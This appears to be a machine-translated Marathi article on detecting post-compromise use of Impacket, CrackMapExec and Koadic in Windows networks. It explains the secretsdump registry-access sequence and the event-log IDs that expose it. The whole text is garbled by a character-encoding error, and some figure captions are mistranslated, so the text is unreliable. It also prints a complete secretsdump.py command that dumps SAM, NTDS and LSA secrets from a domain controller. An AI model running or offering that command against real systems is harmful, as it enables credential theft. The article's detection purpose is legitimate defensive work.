рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ

рдХреЙрд░реНрдкреЛрд░реЗрдЯ рдХреНрд╖реЗрддреНрд░рд╛рддреАрд▓ рд╣рд▓реНрд▓реНрдпрд╛рдВрдЪреА рд╕рдВрдЦреНрдпрд╛ рджрд░рд╡рд░реНрд╖реА рд╡рд╛рдврдд рдЖрд╣реЗ: рдЙрджрд╛рд╣рд░рдгрд╛рд░реНрде 2017 рдордзреНрдпреЗ, 13% рдЕрдзрд┐рдХ рдЕрджреНрд╡рд┐рддреАрдп рдШрдЯрдирд╛рдВрдЪреА рдиреЛрдВрдж рдЭрд╛рд▓реА 2016 рдкреЗрдХреНрд╖рд╛, рдЖрдгрд┐ 2018 рдЪреНрдпрд╛ рд╢реЗрд╡рдЯреА - 27% рдЕрдзрд┐рдХ рдШрдЯрдирд╛рдорд╛рдЧреАрд▓ рдХрд╛рд▓рд╛рд╡рдзреАрдкреЗрдХреНрд╖рд╛. рддреНрдпрд╛рд╕рд╣ рдЬреЗрдереЗ рдореБрдЦреНрдп рдХрд╛рд░реНрдпрд░рдд рд╕рд╛рдзрди рд╡рд┐рдВрдбреЛрдЬ рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдо рдЖрд╣реЗ. 2017-2018 рдордзреНрдпреЗ, APT рдбреНрд░реЕрдЧрдирдлреНрд▓рд╛рдп, APT28, рдПрдкреАрдЯреА рдордбреАрд╡реЙрдЯрд░ рдпреБрд░реЛрдк, рдЙрддреНрддрд░ рдЕрдореЗрд░рд┐рдХрд╛ рдЖрдгрд┐ рд╕реМрджреА рдЕрд░реЗрдмрд┐рдпрд╛рдордзреАрд▓ рд╕рд░рдХрд╛рд░реА рдЖрдгрд┐ рд▓рд╖реНрдХрд░реА рд╕рдВрдШрдЯрдирд╛рдВрд╡рд░ рд╣рд▓реНрд▓реЗ рдХреЗрд▓реЗ. рдЖрдгрд┐ рдЖрдореНрд╣реА рдпрд╛рд╕рд╛рдареА рддреАрди рд╕рд╛рдзрдиреЗ рд╡рд╛рдкрд░рд▓реА - рдЗрдореНрдкреЕрдХреЗрдЯ, рдХреНрд░реЕрдХрдореЕрдкреЗрдХреНрд╕реЗрдХ ╨╕ рдХреЛрдЖрдбрд┐рдХ. рддреНрдпрд╛рдВрдЪрд╛ рд╕реНрддреНрд░реЛрдд рдХреЛрдб рдЦреБрд▓рд╛ рдЖрд╣реЗ рдЖрдгрд┐ GitHub рд╡рд░ рдЙрдкрд▓рдмреНрдз рдЖрд╣реЗ.

рд╣реЗ рд▓рдХреНрд╖рд╛рдд рдШреЗрдгреНрдпрд╛рд╕рд╛рд░рдЦреЗ рдЖрд╣реЗ рдХреА рд╣реА рд╕рд╛рдзрдиреЗ рдкреНрд░рд╛рд░рдВрднрд┐рдХ рдкреНрд░рд╡реЗрд╢рд╛рд╕рд╛рдареА рд╡рд╛рдкрд░рд▓реА рдЬрд╛рдд рдирд╛рд╣реАрдд, рдкрд░рдВрддреБ рдкрд╛рдпрд╛рднреВрдд рд╕реБрд╡рд┐рдзрд╛рдВрдордзреНрдпреЗ рдЖрдХреНрд░рдордг рд╡рд┐рдХрд╕рд┐рдд рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рд╡рд╛рдкрд░рд▓реА рдЬрд╛рддрд╛рдд. рдкрд░рд┐рдорд┐рддреАрдЪреНрдпрд╛ рдЖрдд рдкреНрд░рд╡реЗрд╢ рдХреЗрд▓реНрдпрд╛рдирдВрддрд░ рд╣рд▓реНрд▓реЗрдЦреЛрд░ рд╣рд▓реНрд▓реНрдпрд╛рдЪреНрдпрд╛ рд╡реЗрдЧрд╡реЗрдЧрд│реНрдпрд╛ рдЯрдкреНрдкреНрдпрд╛рдВрд╡рд░ рддреНрдпрд╛рдВрдЪрд╛ рд╡рд╛рдкрд░ рдХрд░рддрд╛рдд. рд╣реЗ, рддрд╕реЗ, рд╢реЛрдзрдгреЗ рдХрдареАрдг рдЖрд╣реЗ рдЖрдгрд┐ рдмрд░реНрдпрд╛рдЪрджрд╛ рдХреЗрд╡рд│ рддрдВрддреНрд░рдЬреНрдЮрд╛рдирд╛рдЪреНрдпрд╛ рдорджрддреАрдиреЗ рдиреЗрдЯрд╡рд░реНрдХ рд░рд╣рджрд╛рд░реАрдордзреНрдпреЗ рддрдбрдЬреЛрдбреАрдЪреЗ рдЯреНрд░реЗрд╕ рдУрд│рдЦрдгреЗ рдХрд┐рдВрд╡рд╛ рдкрд░рд╡рд╛рдирдЧреА рджреЗрдгрд╛рд░реА рд╕рд╛рдзрдиреЗ рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рдиреЗ рдкрд╛рдпрд╛рднреВрдд рд╕реБрд╡рд┐рдзрд╛рдВрдордзреНрдпреЗ рдкреНрд░рд╡реЗрд╢ рдХреЗрд▓реНрдпрд╛рдирдВрддрд░ рддреНрдпрд╛рдЪреНрдпрд╛ рд╕рдХреНрд░рд┐рдп рдХреНрд░рд┐рдпрд╛ рд╢реЛрдзрдгреЗ. рд╕рд╛рдзрдиреЗ рдлрд╛рдпрд▓реА рд╣рд╕реНрддрд╛рдВрддрд░рд┐рдд рдХрд░рдгреНрдпрд╛рдкрд╛рд╕реВрди рддреЗ рд░реЗрдЬрд┐рд╕реНрдЯреНрд░реАрд╢реА рд╕рдВрд╡рд╛рдж рд╕рд╛рдзрдгреНрдпрд╛рдкрд░реНрдпрдВрдд рдЖрдгрд┐ рд░рд┐рдореЛрдЯ рдорд╢реАрдирд╡рд░ рдХрдорд╛рдВрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рдгреНрдпрд╛рдкрд░реНрдпрдВрдд рд╡рд┐рд╡рд┐рдз рдХрд╛рд░реНрдпреЗ рдкреНрд░рджрд╛рди рдХрд░рддрд╛рдд. рдпрд╛ рд╕рд╛рдзрдирд╛рдВрдЪрд╛ рдиреЗрдЯрд╡рд░реНрдХ рдХреНрд░рд┐рдпрд╛рдХрд▓рд╛рдк рдирд┐рд╢реНрдЪрд┐рдд рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдЖрдореНрд╣реА рддреНрдпрд╛рдВрдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХреЗрд▓рд╛.

рдЖрдореНрд╣рд╛рд▓рд╛ рдХрд╛рдп рдХрд░рдгреНрдпрд╛рдЪреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдЖрд╣реЗ:

  • рд╣реЕрдХрд┐рдВрдЧ рд╕рд╛рдзрдиреЗ рдХрд╢реА рдХрд╛рд░реНрдп рдХрд░рддрд╛рдд рддреЗ рд╕рдордЬреВрди рдШреНрдпрд╛. рд╣рд▓реНрд▓реЗрдЦреЛрд░рд╛рдВрдиреА рдХреЛрдгрддреЗ рд╢реЛрд╖рдг рдХрд░рдгреЗ рдЖрд╡рд╢реНрдпрдХ рдЖрд╣реЗ рдЖрдгрд┐ рддреЗ рдХреЛрдгрддреЗ рддрдВрддреНрд░рдЬреНрдЮрд╛рди рд╡рд╛рдкрд░реВ рд╢рдХрддрд╛рдд рддреЗ рд╢реЛрдзрд╛.
  • рд╣рд▓реНрд▓реНрдпрд╛рдЪреНрдпрд╛ рдкрд╣рд┐рд▓реНрдпрд╛ рдЯрдкреНрдкреНрдпрд╛рдд рдорд╛рд╣рд┐рддреА рд╕реБрд░рдХреНрд╖рд╛ рд╕рд╛рдзрдирд╛рдВрджреНрд╡рд╛рд░реЗ рдХрд╛рдп рдЖрдврд│рд▓реЗ рдирд╛рд╣реА рддреЗ рд╢реЛрдзрд╛. рдПрдХрддрд░ рд╣рд▓реНрд▓реЗрдЦреЛрд░ рд╣рд╛ рдЕрдВрддрд░реНрдЧрдд рд╣рд▓реНрд▓реЗрдЦреЛрд░ рдЕрд╕рд▓реНрдпрд╛рдореБрд│реЗ рдХрд┐рдВрд╡рд╛ рд╣рд▓реНрд▓реЗрдЦреЛрд░ рдкреВрд░реНрд╡реА рдорд╛рд╣реАрдд рдирд╕рд▓реЗрд▓реНрдпрд╛ рдкрд╛рдпрд╛рднреВрдд рд╕реБрд╡рд┐рдзрд╛рдВрдордзреАрд▓ рдЫрд┐рджреНрд░рд╛рдЪрд╛ рдЧреИрд░рдлрд╛рдпрджрд╛ рдШреЗрдд рдЕрд╕рд▓реНрдпрд╛рдореБрд│реЗ, рдЯреЛрд╣рдгреНрдпрд╛рдЪрд╛ рдЯрдкреНрдкрд╛ рд╡рдЧрд│рд▓рд╛ рдЬрд╛рдК рд╢рдХрддреЛ. рддреНрдпрд╛рдЪреНрдпрд╛ рдХреГрддреАрдВрдЪреА рд╕рдВрдкреВрд░реНрдг рд╕рд╛рдЦрд│реА рдкреБрдирд░реНрд╕рдВрдЪрдпрд┐рдд рдХрд░рдгреЗ рд╢рдХреНрдп рд╣реЛрддреЗ, рдореНрд╣рдгреВрди рдкреБрдвреАрд▓ рд╣рд╛рд▓рдЪрд╛рд▓реА рд╢реЛрдзрдгреНрдпрд╛рдЪреА рдЗрдЪреНрдЫрд╛.
  • рдШреБрд╕рдЦреЛрд░реА рд╢реЛрдз рд╕рд╛рдзрдирд╛рдВрдордзреВрди рдЦреЛрдЯреЗ рд╕рдХрд╛рд░рд╛рддреНрдордХ рджреВрд░ рдХрд░рд╛. рдЖрдкрдг рд╣реЗ рд╡рд┐рд╕рд░рддрд╛ рдХрд╛рдорд╛ рдирдпреЗ рдХреА рдЬреЗрд╡реНрд╣рд╛ рдХрд╛рд╣реА рдХреГрддреА рдХреЗрд╡рд│ рдЯреЛрдЪрдгреАрдЪреНрдпрд╛ рдЖрдзрд╛рд░реЗ рд╢реЛрдзрд▓реНрдпрд╛ рдЬрд╛рддрд╛рдд рддреЗрд╡реНрд╣рд╛ рд╡рд╛рд░рдВрд╡рд╛рд░ рдЪреБрдХрд╛ рд╢рдХреНрдп рдЕрд╕рддрд╛рдд. рд╕рд╛рдорд╛рдиреНрдпрдд: рдкрд╛рдпрд╛рднреВрдд рд╕реБрд╡рд┐рдзрд╛рдВрдордзреНрдпреЗ рдХреЛрдгрддреАрд╣реА рдорд╛рд╣рд┐рддреА рдорд┐рд│рд╡рд┐рдгреНрдпрд╛рд╕рд╛рдареА рдкреБрд░реЗрд╕реЗ рдорд╛рд░реНрдЧ рдЖрд╣реЗрдд, рдЬреЗ рдкрд╣рд┐рд▓реНрдпрд╛ рджреГрд╖реНрдЯреАрдХреНрд╖реЗрдкрд╛рдд рдХрд╛рдпрджреЗрд╢реАрд░ рдорд╛рд░реНрдЧрд╛рдВрдкреЗрдХреНрд╖рд╛ рд╡реЗрдЧрд│реЗ рдЖрд╣реЗрдд.

рд╣реА рд╕рд╛рдзрдиреЗ рд╣рд▓реНрд▓реЗрдЦреЛрд░рд╛рдВрдирд╛ рдХрд╛рдп рджреЗрддрд╛рдд? рдЬрд░ рд╣реЗ Impacket рдЕрд╕реЗрд▓, рддрд░ рд╣рд▓реНрд▓реЗрдЦреЛрд░рд╛рдВрдирд╛ рдореЙрдбреНрдпреВрд▓рдЪреА рдПрдХ рдореЛрдареА рд▓рд╛рдпрдмреНрд░рд░реА рдорд┐рд│рддреЗ рдЬреА рдкрд░рд┐рдорд┐рддреА рддреЛрдбрд▓реНрдпрд╛рдирдВрддрд░ рд╣рд▓реНрд▓реНрдпрд╛рдЪреНрдпрд╛ рд╡реЗрдЧрд╡реЗрдЧрд│реНрдпрд╛ рдЯрдкреНрдкреНрдпрд╛рдВрд╡рд░ рд╡рд╛рдкрд░рд▓реА рдЬрд╛рдК рд╢рдХрддреЗ. рдЕрдиреЗрдХ рд╕рд╛рдзрдиреЗ рдЕрдВрддрд░реНрдЧрддрд░рд┐рддреНрдпрд╛ Impacket рдореЙрдбреНрдпреВрд▓ рд╡рд╛рдкрд░рддрд╛рдд - рдЙрджрд╛рд╣рд░рдгрд╛рд░реНрде, Metasploit. рдпрд╛рдордзреНрдпреЗ рд░рд┐рдореЛрдЯ рдХрдорд╛рдВрдб рдПрдХреНрдЭрд┐рдХреНрдпреВрд╢рдирд╕рд╛рдареА dcomexec рдЖрдгрд┐ wmiexec, Impacket рдордзреВрди рдЬреЛрдбрд▓реЗрд▓реНрдпрд╛ рдореЗрдорд░реАрдордзреВрди рдЦрд╛рддреА рдорд┐рд│рд╡рд┐рдгреНрдпрд╛рд╕рд╛рдареА secretsdump рдЖрд╣реЗ. рдкрд░рд┐рдгрд╛рдореА, рдЕрд╢рд╛ рд▓рд╛рдпрдмреНрд░рд░реАрдЪреНрдпрд╛ рдХреНрд░рд┐рдпрд╛рдХрд▓рд╛рдкрд╛рдВрдЪреА рдпреЛрдЧреНрдп рддрдкрд╛рд╕рдгреА рдХреЗрд▓реНрдпрд╛рдиреЗ рдбреЗрд░рд┐рд╡реНрд╣реЗрдЯрд┐рд╡реНрд╣реНрдЬ рд╢реЛрдзрдгреЗ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рд╣реЛрдИрд▓.

CrackMapExec (рдХрд┐рдВрд╡рд╛ рдлрдХреНрдд CME) рдмрджреНрджрд▓ рдирд┐рд░реНрдорд╛рддреНрдпрд╛рдВрдиреА "Powered by Impacket" рд▓рд┐рд╣рд┐рд▓реЗ рд╣рд╛ рдпреЛрдЧрд╛рдпреЛрдЧ рдирд╛рд╣реА. рдпрд╛рд╡реНрдпрддрд┐рд░рд┐рдХреНрдд, CME рдХрдбреЗ рд▓реЛрдХрдкреНрд░рд┐рдп рдкрд░рд┐рд╕реНрдерд┐рддреАрдВрд╕рд╛рдареА рддрдпрд╛рд░ рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рдЖрд╣реЗ: рдкрд╛рд╕рд╡рд░реНрдб рдХрд┐рдВрд╡рд╛ рддреНрдпрд╛рдВрдЪреЗ рд╣реЕрд╢ рдорд┐рд│рд╡рд┐рдгреНрдпрд╛рд╕рд╛рдареА Mimikatz, рджреВрд░рд╕реНрде рдЕрдВрдорд▓рдмрдЬрд╛рд╡рдгреАрд╕рд╛рдареА рдореАрдЯрд░рдкреНрд░реАрдЯрд░ рдХрд┐рдВрд╡рд╛ рдПрдореНрдкрд╛рдпрд░ рдПрдЬрдВрдЯрдЪреА рдЕрдВрдорд▓рдмрдЬрд╛рд╡рдгреА рдЖрдгрд┐ рдмреЛрд░реНрдбрд╡рд░ рдмреНрд▓рдбрд╣рд╛рдКрдВрдб.

рдЖрдореНрд╣реА рдирд┐рд╡рдбрд▓реЗрд▓реЗ рддрд┐рд╕рд░реЗ рд╕рд╛рдзрди рдХреЛрдПрдбрд┐рдХ рд╣реЛрддреЗ. рд╣реЗ рдЕрдЧрджреА рдЕрд▓реАрдХрдбреАрд▓ рдЖрд╣реЗ, рддреЗ 25 рдордзреНрдпреЗ рдЖрдВрддрд░рд░рд╛рд╖реНрдЯреНрд░реАрдп рд╣реЕрдХрд░ рдХреЙрдиреНрдлрд░рдиреНрд╕ DEFCON 2017 рдордзреНрдпреЗ рд╕рд╛рджрд░ рдХреЗрд▓реЗ рдЧреЗрд▓реЗ рд╣реЛрддреЗ рдЖрдгрд┐ рддреЗ рдорд╛рдирдХ рдирд╕рд▓реЗрд▓реНрдпрд╛ рджреГрд╖реНрдЯрд┐рдХреЛрдирд╛рдиреЗ рдУрд│рдЦрд▓реЗ рдЬрд╛рддреЗ: рддреЗ HTTP, Java Script рдЖрдгрд┐ Microsoft Visual Basic Script (VBS) рджреНрд╡рд╛рд░реЗ рдХрд╛рд░реНрдп рдХрд░рддреЗ. рдпрд╛ рдкрдзреНрджрддреАрд▓рд╛ рд▓рд┐рд╡реНрд╣рд┐рдВрдЧ рдСрдл рд▓рдБрдб рдЕрд╕реЗ рдореНрд╣рдгрддрд╛рдд: рд╣реЗ рдЯреВрд▓ рд╡рд┐рдВрдбреЛрдЬрдордзреНрдпреЗ рддрдпрд╛рд░ рдХреЗрд▓реЗрд▓реНрдпрд╛ рдЕрд╡рд▓рдВрдмрд┐рддреНрд╡ рдЖрдгрд┐ рд▓рд╛рдпрдмреНрд░рд░реАрдВрдЪрд╛ рд╕рдВрдЪ рд╡рд╛рдкрд░рддреЗ. рдирд┐рд░реНрдорд╛рддреЗ рддреНрдпрд╛рд▓рд╛ COM Command & Control рдХрд┐рдВрд╡рд╛ C3 рдореНрд╣рдгрддрд╛рдд.

IMPACKET

Impacket рдЪреА рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рдЦреВрдк рд╡рд┐рд╕реНрддреГрдд рдЖрд╣реЗ, AD рдордзреНрдпреЗ рдЬрд╛рдгрдгреЗ рдЖрдгрд┐ рдЕрдВрддрд░реНрдЧрдд MS SQL рд╕рд░реНрд╡реНрд╣рд░рд╡рд░реВрди рдбреЗрдЯрд╛ рдЧреЛрд│рд╛ рдХрд░рдгреЗ, рдХреНрд░реЗрдбреЗрдиреНрд╢рд┐рдпрд▓реНрд╕ рдорд┐рд│рд╡рд┐рдгреНрдпрд╛рдЪреНрдпрд╛ рддрдВрддреНрд░рд╛рдВрдкрд░реНрдпрдВрдд: рд╣рд╛ рдПрдХ SMB рд░рд┐рд▓реЗ рд╣рд▓реНрд▓рд╛ рдЖрд╣реЗ рдЖрдгрд┐ рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░рдХрдбреВрди рд╡рд╛рдкрд░рдХрд░реНрддрд╛ рдкрд╛рд╕рд╡рд░реНрдбрдЪреНрдпрд╛ рд╣реЕрд╢ рдЕрд╕рд▓реЗрд▓реА ntds.dit рдлрд╛рдЗрд▓ рдорд┐рд│рд╡рдгреЗ. рдЗрдореНрдкреЕрдХреЗрдЯ рдЪрд╛рд░ рд╡реЗрдЧрд╡реЗрдЧрд│реНрдпрд╛ рдкрджреНрдзрддреАрдВрдЪрд╛ рд╡рд╛рдкрд░ рдХрд░реВрди рджреВрд░рд╕реНрдердкрдгреЗ рдХрдорд╛рдВрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рддреЗ: WMI, Windows рд╢реЗрдбреНрдпреБрд▓рд░ рдореЕрдиреЗрдЬрдореЗрдВрдЯ рд╕рд░реНрд╡реНрд╣рд┐рд╕, DCOM рдЖрдгрд┐ SMB, рдЖрдгрд┐ рдЕрд╕реЗ рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдХреНрд░реЗрдбреЗрдиреНрд╢рд┐рдпрд▓реНрд╕рдЪреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдЕрд╕рддреЗ.

рд╕рд┐рдХреНрд░реЗрдЯреНрд╕рдбрдВрдк

рдЪрд▓рд╛ secretsdump рд╡рд░ рдПрдХ рдирдЬрд░ рдЯрд╛рдХреВрдпрд╛. рд╣реЗ рдПрдХ рдореЙрдбреНрдпреВрд▓ рдЖрд╣реЗ рдЬреЗ рд╡рд╛рдкрд░рдХрд░реНрддрд╛ рдорд╢реАрди рдЖрдгрд┐ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рджреЛрдиреНрд╣реА рд▓рдХреНрд╖реНрдп рдХрд░реВ рд╢рдХрддреЗ. LSA, SAM, SECURITY, NTDS.dit рдпрд╛ рдореЗрдорд░реА рдХреНрд╖реЗрддреНрд░рд╛рдВрдЪреНрдпрд╛ рдкреНрд░рддреА рдорд┐рд│рд╡рд┐рдгреНрдпрд╛рд╕рд╛рдареА рдпрд╛рдЪрд╛ рд╡рд╛рдкрд░ рдХреЗрд▓рд╛ рдЬрд╛рдК рд╢рдХрддреЛ, рддреНрдпрд╛рдореБрд│реЗ рддреЗ рд╣рд▓реНрд▓реНрдпрд╛рдЪреНрдпрд╛ рд╡реЗрдЧрд╡реЗрдЧрд│реНрдпрд╛ рдЯрдкреНрдкреНрдпрд╛рдВрд╡рд░ рдкрд╛рд╣рд┐рд▓реЗ рдЬрд╛рдК рд╢рдХрддреЗ. рдореЙрдбреНрдпреВрд▓рдЪреНрдпрд╛ рдСрдкрд░реЗрд╢рдирдордзреАрд▓ рдкрд╣рд┐рд▓реА рдкрд╛рдпрд░реА рдореНрд╣рдгрдЬреЗ SMB рджреНрд╡рд╛рд░реЗ рдкреНрд░рдорд╛рдгреАрдХрд░рдг, рдЬреНрдпрд╛рд╕рд╛рдареА рдкрд╛рд╕ рдж рд╣реЕрд╢ рд╣рд▓реНрд▓рд╛ рд╕реНрд╡рдпрдВрдЪрд▓рд┐рддрдкрдгреЗ рдкрд╛рд░ рдкрд╛рдбрдгреНрдпрд╛рд╕рд╛рдареА рд╡рд╛рдкрд░рдХрд░реНрддреНрдпрд╛рдЪрд╛ рдкрд╛рд╕рд╡рд░реНрдб рдХрд┐рдВрд╡рд╛ рддреНрдпрд╛рдЪреНрдпрд╛ рд╣реЕрд╢рдЪреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдЕрд╕рддреЗ. рдкреБрдвреЗ рд╕рд░реНрд╡реНрд╣рд┐рд╕ рдХрдВрдЯреНрд░реЛрд▓ рдореЕрдиреЗрдЬрд░ (рдПрд╕рд╕реАрдПрдо) рдордзреНрдпреЗ рдкреНрд░рд╡реЗрд╢ рдЙрдШрдбрдгреНрдпрд╛рдЪреА рдЖрдгрд┐ рд╡рд┐рд░реЗрдЧ рдкреНрд░реЛрдЯреЛрдХреЙрд▓рджреНрд╡рд╛рд░реЗ рд░реЗрдЬрд┐рд╕реНрдЯреНрд░реАрдордзреНрдпреЗ рдкреНрд░рд╡реЗрд╢ рдорд┐рд│рд╡рд┐рдгреНрдпрд╛рдЪреА рд╡рд┐рдирдВрддреА рдпреЗрддреЗ, рдЬреНрдпрд╛рдЪрд╛ рд╡рд╛рдкрд░ рдХрд░реВрди рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛ рд╕реНрд╡рд╛рд░рд╕реНрдп рдЕрд╕рд▓реЗрд▓реНрдпрд╛ рд╢рд╛рдЦрд╛рдВрдЪрд╛ рдбреЗрдЯрд╛ рд╢реЛрдзреВ рд╢рдХрддреЛ рдЖрдгрд┐ SMB рджреНрд╡рд╛рд░реЗ рдкрд░рд┐рдгрд╛рдо рдорд┐рд│рд╡реВ рд╢рдХрддреЛ.

рдЕрдВрдЬреАрд░ рдордзреНрдпреЗ. 1 рдЖрдореНрд╣реА рдкрд╛рд╣рддреЛ рдХреА winreg рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рд╡рд╛рдкрд░рддрд╛рдирд╛, LSA рд╕рд╣ рд░реЗрдЬрд┐рд╕реНрдЯреНрд░реА рдХреА рд╡рд╛рдкрд░реВрди рдкреНрд░рд╡реЗрд╢ рдХрд╕рд╛ рдорд┐рд│рд╡рд▓рд╛ рдЬрд╛рддреЛ. рд╣реЗ рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА, opcode 15 - OpenKey рд╕рд╣ DCERPC рдХрдорд╛рдВрдб рд╡рд╛рдкрд░рд╛.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 1. winreg рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рд╡рд╛рдкрд░реВрди рд░реЗрдЬрд┐рд╕реНрдЯреНрд░реА рдХреА рдЙрдШрдбрдгреЗ

рдкреБрдвреЗ, рдЬреЗрд╡реНрд╣рд╛ рдХреА рдНрдХреНрд╕реЗрд╕ рдкреНрд░рд╛рдкреНрдд рд╣реЛрддреЛ, рддреЗрд╡реНрд╣рд╛ рдореВрд▓реНрдпреЗ opcode 20 рд╕рд╣ SaveKey рдХрдорд╛рдВрдбрд╕рд╣ рд╕реЗрд╡реНрд╣ рдХреЗрд▓реА рдЬрд╛рддрд╛рдд. рдЗрдореНрдкреЕрдХреЗрдЯ рд╣реЗ рдЕрдЧрджреА рд╡рд┐рд╢рд┐рд╖реНрдЯ рдкрджреНрдзрддреАрдиреЗ рдХрд░рддреЗ. рд╣реЗ рд╡реНрд╣реЕрд▓реНрдпреВрдЬ рдлрд╛рдИрд▓рдордзреНрдпреЗ рд╕реЗрд╡реНрд╣ рдХрд░рддреЗ рдЬреНрдпрд╛рдЪреЗ рдирд╛рд╡ .tmp рд╕рд╣ рдЬреЛрдбрд▓реЗрд▓реНрдпрд╛ 8 рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рд╡рд░реНрдгрд╛рдВрдЪреА рд╕реНрдЯреНрд░рд┐рдВрдЧ рдЖрд╣реЗ. рдпрд╛рд╡реНрдпрддрд┐рд░рд┐рдХреНрдд, рдпрд╛ рдлрд╛рдИрд▓рдЪреЗ рдкреБрдвреАрд▓ рдЕрдкрд▓реЛрдб SMB рджреНрд╡рд╛рд░реЗ System32 рдирд┐рд░реНрджреЗрд╢рд┐рдХреЗрддреВрди рд╣реЛрддреЗ (рдЪрд┐рддреНрд░ 2).

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 2. рд░рд┐рдореЛрдЯ рдорд╢реАрдирд╡рд░реВрди рд░реЗрдЬрд┐рд╕реНрдЯреНрд░реА рдХреА рдорд┐рд│рд╡рдгреНрдпрд╛рдЪреА рдпреЛрдЬрдирд╛

рд╣реЗ рдирд┐рд╖реНрдкрдиреНрди рдЭрд╛рд▓реЗ рдХреА рдиреЗрдЯрд╡рд░реНрдХрд╡рд░реАрд▓ рдЕрд╢реА рдХреНрд░рд┐рдпрд╛рдХрд▓рд╛рдк winreg рдкреНрд░реЛрдЯреЛрдХреЙрд▓, рд╡рд┐рд╢рд┐рд╖реНрдЯ рдирд╛рд╡реЗ, рдЖрджреЗрд╢ рдЖрдгрд┐ рддреНрдпрд╛рдВрдЪрд╛ рдХреНрд░рдо рд╡рд╛рдкрд░реВрди рдХрд╛рд╣реА рд░реЗрдЬрд┐рд╕реНрдЯреНрд░реА рд╢рд╛рдЦрд╛рдВрдордзреНрдпреЗ рдХреНрд╡реЗрд░реАрджреНрд╡рд╛рд░реЗ рд╢реЛрдзрд▓рд╛ рдЬрд╛рдК рд╢рдХрддреЛ.

рд╣реЗ рдореЙрдбреНрдпреВрд▓ рд╡рд┐рдВрдбреЛрдЬ рдЗрд╡реНрд╣реЗрдВрдЯ рд▓реЙрдЧрдордзреНрдпреЗ рдЯреНрд░реЗрд╕ рджреЗрдЦреАрд▓ рд╕реЛрдбрддреЗ, рдЬреНрдпрд╛рдореБрд│реЗ рддреЗ рд╢реЛрдзрдгреЗ рд╕реЛрдкреЗ рд╣реЛрддреЗ. рдЙрджрд╛рд╣рд░рдгрд╛рд░реНрде, рдХрдорд╛рдВрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рдгреНрдпрд╛рдЪреНрдпрд╛ рдкрд░рд┐рдгрд╛рдореА

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

рд╡рд┐рдВрдбреЛрдЬ рд╕рд░реНрд╡реНрд╣рд░ 2016 рд▓реЙрдЧрдордзреНрдпреЗ рдЖрдореНрд╣реА рдЦрд╛рд▓реАрд▓ рдкреНрд░рдореБрдЦ рдЗрд╡реНрд╣реЗрдВрдЯрдЪрд╛ рдХреНрд░рдо рдкрд╛рд╣реВ:

1. 4624 - рд░рд┐рдореЛрдЯ рд▓реЙрдЧрдСрди.
2. 5145 - winreg рд░рд┐рдореЛрдЯ рд╕реЗрд╡реЗрд╕рд╛рдареА рдкреНрд░рд╡реЗрд╢ рдЕрдзрд┐рдХрд╛рд░ рддрдкрд╛рд╕рдд рдЖрд╣реЗ.
3. 5145 - System32 рдирд┐рд░реНрджреЗрд╢рд┐рдХреЗрдд рдлрд╛рдЗрд▓ рдкреНрд░рд╡реЗрд╢ рдЕрдзрд┐рдХрд╛рд░ рддрдкрд╛рд╕рдд рдЖрд╣реЗ. рдлрд╛рдИрд▓рдордзреНрдпреЗ рд╡рд░ рдирдореВрдж рдХреЗрд▓реЗрд▓реЗ рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рдирд╛рд╡ рдЖрд╣реЗ.
